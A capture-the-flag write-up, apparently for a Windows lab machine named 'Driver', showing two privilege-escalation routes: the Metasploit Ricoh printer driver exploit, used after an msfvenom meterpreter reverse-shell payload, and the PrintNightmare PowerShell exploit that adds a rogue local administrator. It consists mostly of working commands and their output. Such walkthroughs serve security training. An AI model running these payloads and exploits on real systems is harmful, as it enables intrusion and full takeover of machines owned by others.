PrivEsc

Method 1 - Exploiting Ricoh Printer Driver

Using meterpreter:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe -o rev.exe

After uploading it we catch a shell on msfconsole.

Running post exploitation module linux exploit suggester

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!
 8   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!
 11  exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 12  exploit/windows/local/cve_2024_30088_authz_basep               Yes                      The target appears to be vulnerable. Version detected: Windows 10+ Build 10240
 13  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 14  exploit/windows/local/ricoh_driver_privesc                     Yes                      The target appears to be vulnerable. Ricoh driver directory has full permissions
 15  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

Running the ricoh_driver_privesc

msf6 exploit(windows/local/ricoh_driver_privesc) > run

[*] Started reverse TCP handler on 10.10.16.7:1337 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer MMEyCTJdF...

It stops here. Checking sessions on Windows

msf6 exploit(windows/local/ricoh_driver_privesc) > sessions 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User         Path
 ---   ----  ----                     ----  -------  ----         ----
 0     0     [System Process]
 4     0     System
 264   4     smss.exe
 324   652   explorer.exe             x64   1        DRIVER\tony  C:\Windows\explorer.exe
 340   332   csrss.exe
 444   436   csrss.exe
 456   332   wininit.exe
 492   436   winlogon.exe
 560   456   services.exe
 568   456   lsass.exe
 652   560   svchost.exe
 660   560   sedsvc.exe
 704   560   svchost.exe
 744   560   svchost.exe
 808   560   svchost.exe
 832   560   svchost.exe
 864   560   svchost.exe
 880   492   dwm.exe
 936   560   svchost.exe
 980   560   svchost.exe
 1000  832   WUDFHost.exe
 1052  560   spoolsv.exe
 1280  652   wsmprovhost.exe          x64   0        DRIVER\tony  C:\Windows\System32\wsmprovhost.exe
 1364  560   svchost.exe
 1380  560   svchost.exe              x64   1        DRIVER\tony  C:\Windows\System32\svchost.exe
 1464  560   svchost.exe
 1472  560   svchost.exe
 1484  2256  cmd.exe                  x64   0        DRIVER\tony  C:\Windows\System32\cmd.exe
 1636  560   svchost.exe
 1656  560   vmtoolsd.exe
 1664  560   vm3dservice.exe
 1728  560   VGAuthService.exe
 1736  560   svchost.exe
 1840  1664  vm3dservice.exe
 2208  4664  conhost.exe              x64   0        DRIVER\tony  C:\Windows\System32\conhost.exe
 2236  808   cmd.exe                  x64   1        DRIVER\tony  C:\Windows\System32\cmd.exe
 2248  808   taskhostw.exe            x64   1        DRIVER\tony  C:\Windows\System32\taskhostw.exe
 2256  1280  rev.exe                  x64   0        DRIVER\tony  C:\Users\tony\rev.exe
 2260  808   sihost.exe               x64   1        DRIVER\tony  C:\Windows\System32\sihost.exe
 2344  560   dllhost.exe
 2516  652   WmiPrvSE.exe
 2564  560   msdtc.exe
 2656  560   svchost.exe
 2728  652   explorer.exe             x64   1        DRIVER\tony  C:\Windows\explorer.exe
 2812  2236  conhost.exe              x64   1        DRIVER\tony  C:\Windows\System32\conhost.exe
 2832  560   SearchIndexer.exe
 3048  560   svchost.exe
 3128  3104  explorer.exe             x64   1        DRIVER\tony  C:\Windows\explorer.exe
 3232  652   RuntimeBroker.exe        x64   1        DRIVER\tony  C:\Windows\System32\RuntimeBroker.exe
 3504  652   ShellExperienceHost.exe  x64   1        DRIVER\tony  C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
 3612  652   SearchUI.exe             x64   1        DRIVER\tony  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
 3820  1484  conhost.exe              x64   0        DRIVER\tony  C:\Windows\System32\conhost.exe
 4336  3128  vmtoolsd.exe             x64   1        DRIVER\tony  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 4380  3128  OneDrive.exe             x86   1        DRIVER\tony  C:\Users\tony\AppData\Local\Microsoft\OneDrive\OneDrive.exe
 4520  2236  PING.EXE                 x64   1        DRIVER\tony  C:\Windows\System32\PING.EXE
 4664  5036  cmd.exe                  x64   0        DRIVER\tony  C:\Windows\System32\cmd.exe
 5036  1280  rev.exe                  x64   0        DRIVER\tony  C:\Users\tony\rev.exe
 5056  652   explorer.exe             x64   1        DRIVER\tony  C:\Windows\explorer.exe

Our session which is rev.exe in on session 0. Migrating to a different one works

meterpreter > migrate -N explorer.exe
[*] Migrating from 5036 to 3128...
[*] Migration completed successfully.
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/local/ricoh_driver_privesc) > run

[*] Started reverse TCP handler on 10.10.16.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer RmgIRD...
[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Sending stage (203846 bytes) to 10.10.11.106
[+] Deleted C:\Users\tony\AppData\Local\Temp\HpSzfgA.bat
[+] Deleted C:\Users\tony\AppData\Local\Temp\headerfooter.dll
[*] Meterpreter session 2 opened (10.10.16.7:4444 -> 10.10.11.106:49433) at 2025-02-01 02:47:57 -0600
[*] Deleting printer RmgIRD
[*] Meterpreter session 3 opened (10.10.16.7:4444 -> 10.10.11.106:49432) at 2025-02-01 02:47:58 -0600

meterpreter > shell
Process 2764 created.
Channel 2 created.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

Method 2 - PrintNightmare

*Evil-WinRM* PS C:\users\tony> Set-ExecutionPolicy Bypass -Scope Process
*Evil-WinRM* PS C:\users\tony> . .\CVE-2021-1675.ps1
*Evil-WinRM* PS C:\users\tony> Invoke-Nightmare -NewUser "anonmak9" -NewPassword "pwned"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user anonmak9 as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\users\tony> net user anonmak9
User name                    anonmak9
Full Name                    anonmak9
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/1/2025 7:54:18 AM
Password expires             Never
Password changeable          2/1/2025 7:54:18 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

PreviousEnumeration NextManager

Last updated 10 months ago